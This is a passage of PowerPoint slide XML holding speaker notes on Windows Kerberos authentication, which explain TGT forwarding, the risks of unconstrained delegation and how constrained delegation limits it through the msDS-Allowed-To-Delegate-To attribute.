            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The delegate server sends the service ticket to Server. The ticket contains the user's credentials. The accompanying authenticator is encrypted with the TGS-supplied Delegate/Server session key. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server receives the authentication request and authenticates Delegate—that is, authenticates the user the delegate server is impersonating. Server will then build an access token based on the user's identity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the authenticator passes the test, the service looks for a mutual authentication flag in the delegate's request. If the flag is set, the service uses the session key to encrypt the time from the user's authenticator and returns the result in a Kerberos application reply (KRB_AP_REP). If no mutual authentication flag is set, then no response is needed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="364195388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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The next slides are roughly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> following these steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user authenticates to the Key Distribution Center (KDC) by sending a KRB_AS_REQ message and requests a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC returns a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> TGT in the KRB_AS_REP message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user requests a forwarded TGT based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> TGT from step 2. This is done by the KRB_TGS_REQ message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC returns a forwarded TGT for the user in the KRB_TGS_REP message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user makes a request for a service ticket to Service 1 using the TGT returned in step 2. This is done by the KRB_TGS_REQ message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The ticket-granting service (TGS) returns the service ticket in a KRB_TGS_REP message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The user makes a request to Service 1 by sending a KRB_AP_REQ message, presenting the service ticket, the forwarded TGT, and the session key for the forwarded TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>To fulfill the user's request, Service 1 needs Service 2 to perform some action on behalf of the user. Service 1 uses the forwarded TGT of the user and sends that in a KRB_TGS_REQ message to the KDC, asking for a ticket for Service 2 in the name of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC returns a ticket for Service 2 to Service 1 in a KRB_TGS_REP message, along with a session key that Service 1 can use. The ticket identifies the client as the user, not as Service 1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service 1 makes a request to Service 2 by a KRB_AP_REQ, acting as the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service 2 responds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>With that response, Service 1 can now respond to the user's request in step 7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The TGT forwarding delegation mechanism as described here does not constrain Service 1's use of the forwarded TGT. Service 1 can ask the KDC for a ticket for any other service —in the name of the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KDC will return the requested ticket.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service 1 can then continue to impersonate the user with Service N. This can pose a risk if, for example, Service 1 is compromised. Service 1 can continue to masquerade as a legitimate user to other services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service N will respond to Service 1 as if it was the user's process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe"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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208073002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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377717295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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288272163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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282109305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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31132350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109</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2670779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noProof="0" dirty="0"/>
              <a:t>Kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0" dirty="0"/>
              <a:t> is in certain scenarios much faster than NTLM can be. This is as the server can verify the clients authenticity without presenting the user credentials to the domain controller once more.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0" dirty="0"/>
              <a:t>It also introduced credential delegation. That feature will be covered in detail later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0" dirty="0"/>
              <a:t>In a multi domain environment Kerberos does not require all the domains to trust each other. It uses all existing trusts to find a path to the target even if it takes multiple hops (transitive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" noProof="0" dirty="0"/>
              <a:t>Kerberos makes it extremely hard for an attacker to catch a Kerberos ticket and replay it. This is made sure </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3171023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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231027432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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369004034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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7623743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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38316528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CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15654201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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29389577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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In the Windows 2000 delegation model, the KDC does not limit the scope of services that a Kerberos principal's identity can be delegated to. That is, after a service account is trusted for delegation, it can request service tickets on behalf of a given user to any other service accounts. This unrestricted way of performing delegation does not provide for an application to specify a subset of service accounts that it deems trustworthy to delegate to. Thus, applications can be exposed to broader impersonation risks.</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Impersonation might span across resource domains that have differing levels of security policy requirements, and some of those security policies might be weaker than the application's security requirements. From the domain administrator's point of view, it is risky to enable unconstrained Kerberos delegation in the enterprise, because there is no way to exclude untrusted servers from participating in delegation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>With constrained delegation, on the other hand, domain administrators can configure service accounts to only delegate to specific sets of service accounts. In Windows Server 2003, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-DS-Allowed-To-Delegate-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> attribute is added to service accounts to help enforce constrained delegation. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-DS-Allowed-To-Delegate-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> attribute lists the service principal names (SPNs) of other service accounts that a given service account is allowed to delegate to. When a Windows Server 2003 KDC processes a service ticket request via the constrained delegation extension, it will verify that the target service account is one that is listed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>-DS-Allowed-To-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" b="1"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Delegate-To</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> attribute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
